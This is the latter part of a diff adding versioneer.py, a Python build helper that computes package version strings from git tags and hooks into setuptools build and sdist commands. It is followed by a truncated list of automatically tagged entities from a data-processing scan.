+    """"""TAG[.postDISTANCE[.dev0]+gHEX] .
+
+    The "".dev0"" means dirty. Note that .dev0 sorts backwards
+    (a dirty tree will appear ""older"" than the corresponding clean one),
+    but you shouldn't be releasing software with -dirty anyways.
+
+    Exceptions:
+    1: no tags. 0.postDISTANCE[.dev0]
+    """"""
+    if pieces[""closest-tag""]:
+        rendered = pieces[""closest-tag""]
+        if pieces[""distance""] or pieces[""dirty""]:
+            rendered += "".post%d"" % pieces[""distance""]
+            if pieces[""dirty""]:
+                rendered += "".dev0""
+            rendered += plus_or_dot(pieces)
+            rendered += ""g%s"" % pieces[""short""]
+    else:
+        # exception #1
+        rendered = ""0.post%d"" % pieces[""distance""]
+        if pieces[""dirty""]:
+            rendered += "".dev0""
+        rendered += ""+g%s"" % pieces[""short""]
+    return rendered
+
+
+def render_pep440_old(pieces):
+    """"""TAG[.postDISTANCE[.dev0]] .
+
+    The "".dev0"" means dirty.
+
+    Exceptions:
+    1: no tags.
0.postDISTANCE[.dev0]
+    """"""
+    if pieces[""closest-tag""]:
+        rendered = pieces[""closest-tag""]
+        if pieces[""distance""] or pieces[""dirty""]:
+            rendered += "".post%d"" % pieces[""distance""]
+            if pieces[""dirty""]:
+                rendered += "".dev0""
+    else:
+        # exception #1
+        rendered = ""0.post%d"" % pieces[""distance""]
+        if pieces[""dirty""]:
+            rendered += "".dev0""
+    return rendered
+
+
+def render_git_describe(pieces):
+    """"""TAG[-DISTANCE-gHEX][-dirty].
+
+    Like 'git describe --tags --dirty --always'.
+
+    Exceptions:
+    1: no tags. HEX[-dirty]  (note: no 'g' prefix)
+    """"""
+    if pieces[""closest-tag""]:
+        rendered = pieces[""closest-tag""]
+        if pieces[""distance""]:
+            rendered += ""-%d-g%s"" % (pieces[""distance""], pieces[""short""])
+    else:
+        # exception #1
+        rendered = pieces[""short""]
+    if pieces[""dirty""]:
+        rendered += ""-dirty""
+    return rendered
+
+
+def render_git_describe_long(pieces):
+    """"""TAG-DISTANCE-gHEX[-dirty].
+
+    Like 'git describe --tags --dirty --always --long'.
+    The distance/hash is unconditional.
+
+    Exceptions:
+    1: no tags. HEX[-dirty]  (note: no 'g' prefix)
+    """"""
+    if pieces[""closest-tag""]:
+        rendered = pieces[""closest-tag""]
+        rendered += ""-%d-g%s"" % (pieces[""distance""], pieces[""short""])
+    else:
+        # exception #1
+        rendered = pieces[""short""]
+    if pieces[""dirty""]:
+        rendered += ""-dirty""
+    return rendered
+
+
+def add_one_to_version(version_string, number_index_to_increment=-1):
+    """"""
+    Add one to a version string at the given numeric indices.
+
+    >>> add_one_to_version('v1.2.3')
+    'v1.2.4'
+
+    """"""
+    # Break up the tag by number groups (preserving multi-digit
+    # numbers as multidigit)
+    parts = re.split(""([0-9]+)"", version_string)
+
+    digit_parts = [(i, part) for i, part in enumerate(parts)
+                   if part.isdigit()]
+
+    # Deal with negative indexing.
+    increment_at_index = ((number_index_to_increment + len(digit_parts))
+                          % len(digit_parts))
+    for n_seen, (i, part) in enumerate(digit_parts):
+        if n_seen == increment_at_index:
+            parts[i] = str(int(part) + 1)
+        elif n_seen > increment_at_index:
+            parts[i] = '0'
+    return ''.join(parts)
+
+
+def render_pep440_branch_based(pieces):
+    # [TAG+1 of minor number][.devDISTANCE][+gHEX]. The git short is
+    # included for dirty.
+
+    # exceptions:
+    # 1: no tags. 0.0.0.devDISTANCE[+gHEX]
+
+    replacements = {' ': '.', '(': '', ')': ''}
+    branch_name = pieces.get('branch')
+    for old, new in replacements.items():
+        branch_name = branch_name.replace(old, new)
+    master = branch_name == 'master'
+    maint = re.match(default_maint_branch_regexp,
+                     branch_name or '')
+
+    # If we are on a tag, just pep440-pre it.
+    if pieces[""closest-tag""] and not (pieces[""distance""] or
+                                      pieces[""dirty""]):
+        rendered = pieces[""closest-tag""]
+    else:
+        # Put a default closest-tag in.
+        if not pieces[""closest-tag""]:
+            pieces[""closest-tag""] = '0.0.0'
+
+        if pieces[""distance""] or pieces[""dirty""]:
+            if maint:
+                rendered = pieces[""closest-tag""]
+                if pieces[""distance""]:
+                    rendered += "".post%d"" % pieces[""distance""]
+            else:
+                rendered = add_one_to_version(pieces[""closest-tag""])
+                if pieces[""distance""]:
+                    rendered += "".dev%d"" % pieces[""distance""]
+
+            suffix = []
+            # Put the branch name in if it isn't master nor a
+            # maintenance branch.
+            if not (master or maint):
+                suffix.append('%s' % (branch_name or 'unknown_branch'))
+
+            if pieces[""dirty""]:
+                suffix.append('g%s' % pieces[""short""])
+            rendered += '+%s' % ''.join(suffix)
+        else:
+            rendered = pieces[""closest-tag""]
+    return rendered
+
+
+STYLES = {'default': render_pep440,
+          'pep440': render_pep440,
+          'pep440-pre': render_pep440_pre,
+          'pep440-post': render_pep440_post,
+          'pep440-old': render_pep440_old,
+          'git-describe': render_git_describe,
+          'git-describe-long': render_git_describe_long,
+          'pep440-branch-based': render_pep440_branch_based,
+          }
+
+
+def render(pieces, style):
+    """"""Render the given version pieces into the requested style.""""""
+    if pieces[""error""]:
+        return {""version"": ""unknown"",
+                ""full-revisionid"": pieces.get(""long""),
+                ""dirty"": None,
+                ""error"": pieces[""error""]}
+
+    if not style:
+        style = 'default'
+
+    renderer = STYLES.get(style)
+
+    if not renderer:
+        raise ValueError(""unknown style '%s'"" % style)
+
+    rendered = renderer(pieces)
+
+    return {""version"": rendered, ""full-revisionid"": pieces[""long""],
+            ""dirty"": pieces[""dirty""], ""error"": None}
+
+
+class VersioneerBadRootError(Exception):
+
+    """"""The project root directory is unknown or missing key files.""""""
+
+
+def get_versions(verbose=False):
+    """"""Get the project version from whatever source is available.
+
+    Returns dict with two keys: 'version' and 'full'.
+    """"""
+    if ""versioneer"" in sys.modules:
+        # see the discussion in cmdclass.py:get_cmdclass()
+        del sys.modules[""versioneer""]
+
+    root = get_root()
+    cfg = get_config_from_root(root)
+
+    assert cfg.VCS is not None, ""please set [versioneer]VCS= in setup.cfg""
+    handlers = HANDLERS.get(cfg.VCS)
+    assert handlers, ""unrecognized VCS '%s'"" % cfg.VCS
+    verbose = verbose or cfg.verbose
+    assert cfg.versionfile_source is not None, \
+        ""please set versioneer.versionfile_source""
+    assert cfg.tag_prefix is not None, ""please set versioneer.tag_prefix""
+
+    versionfile_abs = os.path.join(root, cfg.versionfile_source)
+
+    # extract version from first of: _version.py, VCS command (e.g. 'git
+    # describe'), parentdir. This is meant to work for developers using a
+    # source checkout, for users of a tarball created by 'setup.py sdist',
+    # and for users of a tarball/zipball created by 'git archive' or github's
+    # download-from-tag feature or the equivalent in other VCSes.
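+    # As in the generated _version.py, each handler raises NotThisMethod
+    # when its source of version information is unavailable, and we fall
+    # through to the next strategy in order.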
+
+    get_keywords_f = handlers.get(""get_keywords"")
+    from_keywords_f = handlers.get(""keywords"")
+    if get_keywords_f and from_keywords_f:
+        try:
+            keywords = get_keywords_f(versionfile_abs)
+            ver = from_keywords_f(keywords, cfg.tag_prefix, verbose)
+            if verbose:
+                print(""got version from expanded keyword %s"" % ver)
+            return ver
+        except NotThisMethod:
+            pass
+
+    try:
+        ver = versions_from_file(versionfile_abs)
+        if verbose:
+            print(""got version from file %s %s"" % (versionfile_abs, ver))
+        return ver
+    except NotThisMethod:
+        pass
+
+    from_vcs_f = handlers.get(""pieces_from_vcs"")
+    if from_vcs_f:
+        try:
+            pieces = from_vcs_f(cfg.tag_prefix, root, verbose)
+            ver = render(pieces, cfg.style)
+            if verbose:
+                print(""got version from VCS %s"" % ver)
+            return ver
+        except NotThisMethod:
+            pass
+
+    try:
+        if cfg.parentdir_prefix:
+            ver = versions_from_parentdir(cfg.parentdir_prefix, root, verbose)
+            if verbose:
+                print(""got version from parentdir %s"" % ver)
+            return ver
+    except NotThisMethod:
+        pass
+
+    if verbose:
+        print(""unable to compute version"")
+
+    return {""version"": ""0+unknown"", ""full-revisionid"": None,
+            ""dirty"": None, ""error"": ""unable to compute version""}
+
+
+def get_version():
+    """"""Get the short version string for this project.""""""
+    return get_versions()[""version""]
+
+
+def get_cmdclass():
+    """"""Get the custom setuptools/distutils subclasses used by Versioneer.""""""
+    if ""versioneer"" in sys.modules:
+        del sys.modules[""versioneer""]
+        # this fixes the ""python setup.py develop"" case (also 'install' and
+        # 'easy_install .'), in which subdependencies of the main project are
+        # built (using setup.py bdist_egg) in the same python process. Assume
+        # a main project A and a dependency B, which use different versions
+        # of Versioneer. A's setup.py imports A's Versioneer, leaving it in
+        # sys.modules by the time B's setup.py is executed, causing B to run
+        # with the wrong versioneer. Setuptools wraps the sub-dep builds in a
+        # sandbox that restores sys.modules to its pre-build state, so the
+        # parent is protected against the child's ""import versioneer"". By
+        # removing ourselves from sys.modules here, before the child build
+        # happens, we protect the child from the parent's versioneer too.
+        # Also see https://github.com/warner/python-versioneer/issues/52
+
+    cmds = {}
+
+    # we add ""version"" to both distutils and setuptools
+    from distutils.core import Command
+
+    class cmd_version(Command):
+        description = ""report generated version string""
+        user_options = []
+        boolean_options = []
+
+        def initialize_options(self):
+            pass
+
+        def finalize_options(self):
+            pass
+
+        def run(self):
+            vers = get_versions(verbose=True)
+            print(""Version: %s"" % vers[""version""])
+            print("" full-revisionid: %s"" % vers.get(""full-revisionid""))
+            print("" dirty: %s"" % vers.get(""dirty""))
+            if vers[""error""]:
+                print("" error: %s"" % vers[""error""])
+    cmds[""version""] = cmd_version
+
+    # we override ""build_py"" in both distutils and setuptools
+    #
+    # most invocation pathways end up running build_py:
+    #  distutils/build -> build_py
+    #  distutils/install -> distutils/build ->..
+    #  setuptools/bdist_wheel -> distutils/install ->..
+    #  setuptools/bdist_egg -> distutils/install_lib -> build_py
+    #  setuptools/install -> bdist_egg ->..
+    #  setuptools/develop -> ?
+ + # we override different ""build_py"" commands for both environments + if ""setuptools"" in sys.modules: + from setuptools.command.build_py import build_py as _build_py + else: + from distutils.command.build_py import build_py as _build_py + + class cmd_build_py(_build_py): + def run(self): + root = get_root() + cfg = get_config_from_root(root) + versions = get_versions() + _build_py.run(self) + # now locate _version.py in the new build/ directory and replace + # it with an updated value + if cfg.versionfile_build: + target_versionfile = os.path.join(self.build_lib, + cfg.versionfile_build) + print(""UPDATING %s"" % target_versionfile) + write_to_version_file(target_versionfile, versions) + cmds[""build_py""] = cmd_build_py + + if ""cx_Freeze"" in sys.modules: # cx_freeze enabled? + from cx_Freeze.dist import build_exe as _build_exe + + class cmd_build_exe(_build_exe): + def run(self): + root = get_root() + cfg = get_config_from_root(root) + versions = get_versions() + target_versionfile = cfg.versionfile_source + print(""UPDATING %s"" % target_versionfile) + write_to_version_file(target_versionfile, versions) + + _build_exe.run(self) + os.unlink(target_versionfile) + with open(cfg.versionfile_source, ""w"") as f: + LONG = LONG_VERSION_PY[cfg.VCS] + f.write(LONG % + {""DOLLAR"": ""$"", + ""STYLE"": cfg.style, + ""TAG_PREFIX"": cfg.tag_prefix, + ""PARENTDIR_PREFIX"": cfg.parentdir_prefix, + ""VERSIONFILE_SOURCE"": cfg.versionfile_source, + }) + cmds[""build_exe""] = cmd_build_exe + del cmds[""build_py""] + + # we override different ""sdist"" commands for both environments + if ""setuptools"" in sys.modules: + from setuptools.command.sdist import sdist as _sdist + else: + from distutils.command.sdist import sdist as _sdist + + class cmd_sdist(_sdist): + def run(self): + versions = get_versions() + self._versioneer_generated_versions = versions + # unless we update this, the command will keep using the old + # version + self.distribution.metadata.version = versions[""version""] + return _sdist.run(self) + + def make_release_tree(self, base_dir, files): + root = get_root() + cfg = get_config_from_root(root) + _sdist.make_release_tree(self, base_dir, files) + # now locate _version.py in the new base_dir directory + # (remembering that it may be a hardlink) and replace it with an + # updated value + target_versionfile = os.path.join(base_dir, cfg.versionfile_source) + print(""UPDATING %s"" % target_versionfile) + write_to_version_file(target_versionfile, + self._versioneer_generated_versions) + cmds[""sdist""] = cmd_sdist + + return cmds + + +CONFIG_ERROR = """""" +setup.cfg is missing the necessary Versioneer configuration. You need +a section like: + + [versioneer] + VCS = git + style = pep440 + versionfile_source = src/myproject/_version.py + versionfile_build = myproject/_version.py + tag_prefix = + parentdir_prefix = myproject- + +You will also need to edit your setup.py to use the results: + + import versioneer + setup(version=versioneer.get_version(), + cmdclass=versioneer.get_cmdclass(), ...) + +Please read the docstring in ./versioneer.py for configuration instructions, +edit setup.cfg, and re-run the installer or 'python versioneer.py setup'. +"""""" + +SAMPLE_CONFIG = """""" +# See the docstring in versioneer.py for instructions. Note that you must +# re-run 'versioneer.py setup' after changing this section, and commit the +# resulting files. 
+ +[versioneer] +#VCS = git +#style = pep440 +#versionfile_source = +#versionfile_build = +#tag_prefix = +#parentdir_prefix = + +"""""" + +INIT_PY_SNIPPET = """""" +from ._version import get_versions +__version__ = get_versions()['version'] +del get_versions +"""""" + + +def do_setup(): + """"""Main VCS-independent setup function for installing Versioneer."""""" + root = get_root() + try: + cfg = get_config_from_root(root) + except (EnvironmentError, configparser.NoSectionError, + configparser.NoOptionError) as e: + if isinstance(e, (EnvironmentError, configparser.NoSectionError)): + print(""Adding sample versioneer config to setup.cfg"", + file=sys.stderr) + with open(os.path.join(root, ""setup.cfg""), ""a"") as f: + f.write(SAMPLE_CONFIG) + print(CONFIG_ERROR, file=sys.stderr) + return 1 + + print("" creating %s"" % cfg.versionfile_source) + with open(cfg.versionfile_source, ""w"") as f: + LONG = LONG_VERSION_PY[cfg.VCS] + f.write(LONG % {""DOLLAR"": ""$"", + ""STYLE"": cfg.style, + ""TAG_PREFIX"": cfg.tag_prefix, + ""PARENTDIR_PREFIX"": cfg.parentdir_prefix, + ""VERSIONFILE_SOURCE"": cfg.versionfile_source, + }) + + ipy = os.path.join(os.path.dirname(cfg.versionfile_source), + ""__init__.py"") + if os.path.exists(ipy): + try: + with open(ipy, ""r"") as f: + old = f.read() + except EnvironmentError: + old = """" + if INIT_PY_SNIPPET not in old: + print("" appending to %s"" % ipy) + with open(ipy, ""a"") as f: + f.write(INIT_PY_SNIPPET) + else: + print("" %s unmodified"" % ipy) + else: + print("" %s doesn't exist, ok"" % ipy) + ipy = None + + # Make sure both the top-level ""versioneer.py"" and versionfile_source + # (PKG/_version.py, used by runtime code) are in MANIFEST.in, so + # they'll be copied into source distributions. Pip won't be able to + # install the package without this. + manifest_in = os.path.join(root, ""MANIFEST.in"") + simple_includes = set() + try: + with open(manifest_in, ""r"") as f: + for line in f: + if line.startswith(""include ""): + for include in line.split()[1:]: + simple_includes.add(include) + except EnvironmentError: + pass + # That doesn't cover everything MANIFEST.in can do + # (http://docs.python.org/2/distutils/sourcedist.html#commands), so + # it might give some false negatives. Appending redundant 'include' + # lines is safe, though. + if ""versioneer.py"" not in simple_includes: + print("" appending 'versioneer.py' to MANIFEST.in"") + with open(manifest_in, ""a"") as f: + f.write(""include versioneer.py\n"") + else: + print("" 'versioneer.py' already in MANIFEST.in"") + if cfg.versionfile_source not in simple_includes: + print("" appending versionfile_source ('%s') to MANIFEST.in"" % + cfg.versionfile_source) + with open(manifest_in, ""a"") as f: + f.write(""include %s\n"" % cfg.versionfile_source) + else: + print("" versionfile_source already in MANIFEST.in"") + + # Make VCS-specific changes. For git, this means creating/changing + # .gitattributes to mark _version.py for export-time keyword + # substitution. 
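+ # Sketch of the expected result (assuming git as the VCS): do_vcs_install() + # appends a line of the form + # PKG/_version.py export-subst + # to .gitattributes so that 'git archive' expands the $Format:...$ + # keywords embedded in _version.py.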
+ do_vcs_install(manifest_in, cfg.versionfile_source, ipy) + return 0 + + +def scan_setup_py(): + """"""Validate the contents of setup.py against Versioneer's expectations."""""" + found = set() + setters = False + errors = 0 + with open(""setup.py"", ""r"") as f: + for line in f.readlines(): + if ""import versioneer"" in line: + found.add(""import"") + if ""versioneer.get_cmdclass()"" in line: + found.add(""cmdclass"") + if ""versioneer.get_version()"" in line: + found.add(""get_version"") + if ""versioneer.VCS"" in line: + setters = True + if ""versioneer.versionfile_source"" in line: + setters = True + if len(found) != 3: + print("""") + print(""Your setup.py appears to be missing some important items"") + print(""(but I might be wrong). Please make sure it has something"") + print(""roughly like the following:"") + print("""") + print("" import versioneer"") + print("" setup( version=versioneer.get_version(),"") + print("" cmdclass=versioneer.get_cmdclass(), ...)"") + print("""") + errors += 1 + if setters: + print(""You should remove lines like 'versioneer.VCS = ' and"") + print(""'versioneer.versionfile_source = ' . This configuration"") + print(""now lives in setup.cfg, and should be removed from setup.py"") + print("""") + errors += 1 + return errors + +if __name__ == ""__main__"": + cmd = sys.argv[1] + if cmd == ""setup"": + errors = do_setup() + errors += scan_setup_py() + if errors: + sys.exit(1) +",72574,"[['PERSON', 'Brian Warner'], ['PERSON', 'NUMCOMMITS.gHASH'], ['DATE_TIME', '0.14'], ['PERSON', 'EnvironmentError'], ['LOCATION', 'configparser'], ['PERSON', 'cfg.versionfile_source = get(parser'], ['PERSON', 'EnvironmentError'], ['PERSON', 'cfg.style'], ['PERSON', 'cfg.versionfile_source'], ['PERSON', 'EnvironmentError'], ['PERSON', 'dirname = os.path.basename(root'], ['PERSON', 'rootdir'], ['PERSON', 'dirname'], ['PERSON', 'dirname[len(parentdir_prefix'], ['PERSON', 'NotThisMethod(""no'], ['LOCATION', 'print(fmt'], ['LOCATION', 'n_seen'], ['DATE_TIME', 'n_seen'], ['LOCATION', '.git'], ['LOCATION', 'cfg.style'], ['PERSON', 'NotThisMethod(""no'], ['LOCATION', 'print(fmt'], ['NRP', 'f.write(""%s'], ['PERSON', 'dirname = os.path.basename(root'], ['PERSON', 'rootdir'], ['PERSON', 'dirname'], ['PERSON', 'dirname[len(parentdir_prefix'], ['PERSON', 'NotThisMethod(""no version_json'], ['PERSON', 'separators='], ['LOCATION', 'n_seen'], ['DATE_TIME', 'n_seen'], ['LOCATION', 'sys.modules'], ['PERSON', 'get_cmdclass'], ['PERSON', 'zipball'], ['PERSON', 'from_keywords_f'], ['PERSON', 'from_vcs_f'], ['LOCATION', 'cfg.style'], ['PERSON', 'get_cmdclass'], ['LOCATION', 'sys.modules'], ['LOCATION', 'sys.modules'], ['LOCATION', 'sys.modules'], ['LOCATION', 'sys.modules'], ['LOCATION', 'sys.modules'], ['LOCATION', 'sys.modules'], ['PERSON', 'open(cfg.versionfile_source'], ['URL', 'cfg.ve'], ['PERSON', 'cfg.style'], ['PERSON', 'cfg.versionfile_source'], ['LOCATION', 'sys.modules'], ['NRP', 'distutils.command.sdist'], ['PERSON', 'hardlink'], ['PERSON', 'cfg.versionfile_source'], ['PERSON', 'versionfile_build'], ['PERSON', 'EnvironmentError'], ['LOCATION', 'configparser.'], ['PERSON', 'EnvironmentError'], ['LOCATION', 'configparser.'], ['PERSON', 'open(cfg.versionfile_source'], ['PERSON', 'cfg.style'], ['PERSON', 'EnvironmentError'], ['LOCATION', 'MANIFEST.in'], ['PERSON', 'cfg.versionfile_source'], ['URL', 'https://github.com/warner/python-versioneer'], ['URL', 'https://pypip.in/version/versioneer/badge.svg?style=flat'], ['URL', 'https://pypi.python.org/pypi/versioneer/'], ['URL', 
'https://travis-ci.org/warner/python-versioneer.png?branch=master'], ['URL', 'https://travis-ci.org/warner/python-versioneer'], ['URL', 'https://creativecommons.org/publicdomain/zero/1.0/'], ['URL', 'https://github.com/warner/python-versioneer'], ['URL', 'https://github.com/warner/python-versioneer/issues/52'], ['URL', 'http://docs.python.org/2/distutils/sourcedist.html#commands'], ['URL', 'setup.cf'], ['URL', 'setup.py'], ['URL', 'version.py'], ['URL', 'setup.py'], ['URL', 'version.py'], ['URL', 'version.py'], ['URL', 'version.py'], ['URL', 'version.py'], ['URL', 'setup.py'], ['URL', 'versioneer.py'], ['URL', 'setup.py'], ['URL', 'setup.cf'], ['URL', 'setup.py'], ['URL', 'setup.py'], ['URL', 'version.py'], ['URL', 'DISTANCE.gS'], ['URL', 'version.py'], ['URL', 'version.py'], ['URL', 'setup.py'], ['URL', 'version.py'], ['URL', 'setup.py'], ['URL', 'version.py'], ['URL', 'setup.py'], ['URL', 'setup.py'], ['URL', 'version.py'], ['URL', 'version.py'], ['URL', 'setup.py'], ['URL', 'version.py'], ['URL', 'setup.py'], ['URL', 'distutils.com'], ['URL', 'versioneer.ge'], ['URL', 'setup.py'], ['URL', 'setup.cf'], ['URL', 'versioneer.py'], ['URL', 'versioneer.py'], ['URL', 'setup.cf'], ['URL', 'version.py'], ['URL', 'version.py'], ['URL', 'versioneer.py'], ['URL', 'version.py'], ['URL', 'version.py'], ['URL', 'version.py'], ['URL', 'MANIFEST.in'], ['URL', 'versioneer.py'], ['URL', 'version.py'], ['URL', 'setup.py'], ['URL', 'setup.cf'], ['URL', 'setup.py'], ['URL', 'versioneer.ge'], ['URL', 'versioneer.ge'], ['URL', 'setup.py'], ['URL', 'setup.cf'], ['URL', 'setup.py'], ['URL', 'untagged.NUMCOMMITS.gH'], ['URL', 'setup.py'], ['URL', 'versioneer.py'], ['URL', 'setup.py'], ['URL', 'setup.cf'], ['URL', 'DISTANCE.gH'], ['URL', 'details.md'], ['URL', 'setup.py'], ['URL', 'setup.cf'], ['URL', 'version.py'], ['URL', 'setup.cf'], ['URL', 'setup.py'], ['URL', 'setup.cf'], ['URL', 'versioneer.VC'], ['URL', 'setup.py'], ['URL', 'setup.py'], ['URL', 'versioneer.py'], ['URL', 'make-versioneer.py'], ['URL', 'make-versioneer.py'], ['URL', 'versioneer.py'], ['URL', 'setup.py'], ['URL', 'version.py'], ['URL', 'setup.py'], ['URL', 'setup.cf'], ['URL', 'versioneer.py'], ['URL', 'os.path.re'], ['URL', 'os.pa'], ['URL', 'os.ge'], ['URL', 'os.path.jo'], ['URL', 'setup.py'], ['URL', 'os.path.jo'], ['URL', 'versioneer.py'], ['URL', 'os.pa'], ['URL', 'os.pa'], ['URL', 'setup.py'], ['URL', 'os.pa'], ['URL', 'os.path.re'], ['URL', 'os.pa'], ['URL', 'sys.ar'], ['URL', 'os.path.jo'], ['URL', 'setup.py'], ['URL', 'os.path.jo'], ['URL', 'versioneer.py'], ['URL', 'os.pa'], ['URL', 'os.pa'], ['URL', 'setup.py'], ['URL', 'setup.py'], ['URL', 'sys.ar'], ['URL', 'setup.py'], ['URL', 'setup.py'], ['URL', 'os.pa'], ['URL', 'versioneer.py'], ['URL', 'os.path.re'], ['URL', 'os.pa'], ['URL', 'os.pa'], ['URL', 'os.pa'], ['URL', 'versioneer.py'], ['URL', 'os.pa'], ['URL', 'setup.cf'], ['URL', 'setup.cf'], ['URL', 'configparser.No'], ['URL', 'configparser.No'], ['URL', 'versioneer.py'], ['URL', 'setup.cf'], ['URL', 'os.path.jo'], ['URL', 'setup.cf'], ['URL', 'configparser.Sa'], ['URL', 'parser.re'], ['URL', 'parser.ge'], ['URL', 'parser.ge'], ['URL', 'cfg.VC'], ['URL', 'cfg.st'], ['URL', 'cfg.ve'], ['URL', 'cfg.ve'], ['URL', 'cfg.pa'], ['URL', 'cfg.ve'], ['URL', 'git.cm'], ['URL', 'e.er'], ['URL', 'p.com'], ['URL', 'sys.ve'], ['URL', 'stdout.de'], ['URL', 'p.re'], ['URL', 'setup.py'], ['URL', 'setup.py'], ['URL', 'version.py'], ['URL', 'setup.py/versioneer.py'], ['URL', 'version.py'], ['URL', 'setup.py'], ['URL', 'version.py'], ['URL', 
'cfg.VC'], ['URL', 'cfg.st'], ['URL', 'cfg.pa'], ['URL', 'cfg.ve'], ['URL', 'cfg.ve'], ['URL', 'git.cm'], ['URL', 'e.er'], ['URL', 'p.com'], ['URL', 'sys.ve'], ['URL', 'stdout.de'], ['URL', 'p.re'], ['URL', 'os.path.ba'], ['URL', 'dirname.st'], ['URL', 'version.py'], ['URL', 'setup.py'], ['URL', 'version.py'], ['URL', 'version.py'], ['URL', 'f.re'], ['URL', 'line.st'], ['URL', 're.se'], ['URL', 'mo.gr'], ['URL', 'line.st'], ['URL', 're.se'], ['URL', 'mo.gr'], ['URL', 'f.cl'], ['URL', 'refnames.st'], ['URL', 'r.st'], ['URL', 'refnames.st'], ['URL', 'r.st'], ['URL', 're.se'], ['URL', 'ref.st'], ['URL', 'version.py'], ['URL', 'os.pa'], ['URL', 'os.path.jo'], ['URL', 'sys.pl'], ['URL', 'git.cm'], ['URL', 'out.st'], ['URL', 'out.st'], ['URL', 're.se'], ['URL', 'mo.gr'], ['URL', 'tag.st'], ['URL', 'mo.gr'], ['URL', 'mo.gr'], ['URL', 'pieces.ge'], ['URL', 'DISTANCE.gH'], ['URL', '0.gH'], ['URL', 'untagged.DISTANCE.gH'], ['URL', '.post.de'], ['URL', '0.post.de'], ['URL', '.post.de'], ['URL', '0.post.de'], ['URL', 'part.is'], ['URL', '0.0.0.de'], ['URL', 'pieces.ge'], ['URL', 'replacements.it'], ['URL', 're.ma'], ['URL', 'pieces.ge'], ['URL', 'STYLES.ge'], ['URL', 'version.py'], ['URL', 'cfg.ve'], ['URL', 'os.path.re'], ['URL', 'cfg.ve'], ['URL', 'os.pa'], ['URL', 'cfg.st'], ['URL', 'cfg.pa'], ['URL', 'cfg.pa'], ['URL', 'version.py'], ['URL', 'setup.py'], ['URL', 'version.py'], ['URL', 'version.py'], ['URL', 'f.re'], ['URL', 'line.st'], ['URL', 're.se'], ['URL', 'mo.gr'], ['URL', 'line.st'], ['URL', 're.se'], ['URL', 'mo.gr'], ['URL', 'f.cl'], ['URL', 'refnames.st'], ['URL', 'r.st'], ['URL', 'refnames.st'], ['URL', 'r.st'], ['URL', 're.se'], ['URL', 'ref.st'], ['URL', 'version.py'], ['URL', 'os.pa'], ['URL', 'os.path.jo'], ['URL', 'sys.pl'], ['URL', 'git.cm'], ['URL', 'out.st'], ['URL', 'out.st'], ['URL', 're.se'], ['URL', 'mo.gr'], ['URL', 'tag.st'], ['URL', 'mo.gr'], ['URL', 'mo.gr'], ['URL', 'version.py'], ['URL', 'sys.pl'], ['URL', 'git.cm'], ['URL', 'os.pa'], ['URL', 'os.path.re'], ['URL', 'versioneer.py'], ['URL', 'f.re'], ['URL', 'line.st'], ['URL', 'line.st'], ['URL', 'f.cl'], ['URL', 'f.cl'], ['URL', 'os.path.ba'], ['URL', 'dirname.st'], ['URL', 'versioneer.py'], ['URL', 'version.py'], ['URL', 'f.re'], ['URL', 'version.py'], ['URL', 're.se'], ['URL', 'version.py'], ['URL', 'mo.gr'], ['URL', 'version.py'], ['URL', 'pieces.ge'], ['URL', 'DISTANCE.gH'], ['URL', '0.gH'], ['URL', 'untagged.DISTANCE.gH'], ['URL', '.post.de'], ['URL', '0.post.de'], ['URL', '.post.de'], ['URL', '0.post.de'], ['URL', 'part.is'], ['URL', '0.0.0.de'], ['URL', 'pieces.ge'], ['URL', 'replacements.it'], ['URL', 'name.re'], ['URL', 're.ma'], ['URL', 'pieces.ge'], ['URL', 'STYLES.ge'], ['URL', 'sys.mo'], ['URL', 'cmdclass.py'], ['URL', 'sys.mo'], ['URL', 'cfg.VC'], ['URL', 'setup.cf'], ['URL', 'HANDLERS.ge'], ['URL', 'cfg.VC'], ['URL', 'cfg.VC'], ['URL', 'cfg.ve'], ['URL', 'cfg.ve'], ['URL', 'versioneer.ve'], ['URL', 'os.path.jo'], ['URL', 'cfg.ve'], ['URL', 'version.py'], ['URL', 'setup.py'], ['URL', 'handlers.ge'], ['URL', 'handlers.ge'], ['URL', 'handlers.ge'], ['URL', 'cfg.st'], ['URL', 'cfg.pa'], ['URL', 'cfg.pa'], ['URL', 'sys.mo'], ['URL', 'sys.mo'], ['URL', 'setup.py'], ['URL', 'setup.py'], ['URL', 'setup.py'], ['URL', 'sys.mo'], ['URL', 'setup.py'], ['URL', 'sys.mo'], ['URL', 'sys.mo'], ['URL', 'distutils.co'], ['URL', 'vers.ge'], ['URL', 'vers.ge'], ['URL', 'sys.mo'], ['URL', 'setuptools.com'], ['URL', 'distutils.com'], ['URL', 'py.ru'], ['URL', 'version.py'], ['URL', 'cfg.ve'], ['URL', 'os.path.jo'], ['URL', 
'cfg.ve'], ['URL', 'sys.mo'], ['URL', 'cfg.ve'], ['URL', 'exe.ru'], ['URL', 'cfg.VC'], ['URL', 'cfg.st'], ['URL', 'cfg.pa'], ['URL', 'cfg.ve'], ['URL', 'sys.mo'], ['URL', 'setuptools.command.sd'], ['URL', 'distutils.command.sd'], ['URL', 'self.distribution.metadata.ve'], ['URL', 'sdist.ru'], ['URL', 'sdist.ma'], ['URL', 'version.py'], ['URL', 'os.path.jo'], ['URL', 'cfg.ve'], ['URL', 'setup.cf'], ['URL', 'version.py'], ['URL', 'version.py'], ['URL', 'setup.py'], ['URL', 'versioneer.ge'], ['URL', 'versioneer.ge'], ['URL', 'versioneer.py'], ['URL', 'setup.cf'], ['URL', 'versioneer.py'], ['URL', 'versioneer.py'], ['URL', 'versioneer.py'], ['URL', 'configparser.No'], ['URL', 'configparser.No'], ['URL', 'configparser.No'], ['URL', 'setup.cf'], ['URL', 'sys.st'], ['URL', 'os.path.jo'], ['URL', 'setup.cf'], ['URL', 'sys.st'], ['URL', 'cfg.ve'], ['URL', 'cfg.ve'], ['URL', 'cfg.VC'], ['URL', 'cfg.st'], ['URL', 'cfg.pa'], ['URL', 'cfg.ve'], ['URL', 'os.path.jo'], ['URL', 'os.pa'], ['URL', 'cfg.ve'], ['URL', 'os.pa'], ['URL', 'f.re'], ['URL', 'versioneer.py'], ['URL', 'version.py'], ['URL', 'MANIFEST.in'], ['URL', 'os.path.jo'], ['URL', 'MANIFEST.in'], ['URL', 'line.st'], ['URL', 'includes.ad'], ['URL', 'MANIFEST.in'], ['URL', 'versioneer.py'], ['URL', 'versioneer.py'], ['URL', 'MANIFEST.in'], ['URL', 'versioneer.py'], ['URL', 'versioneer.py'], ['URL', 'MANIFEST.in'], ['URL', 'cfg.ve'], ['URL', 'MANIFEST.in'], ['URL', 'cfg.ve'], ['URL', 'cfg.ve'], ['URL', 'MANIFEST.in'], ['URL', 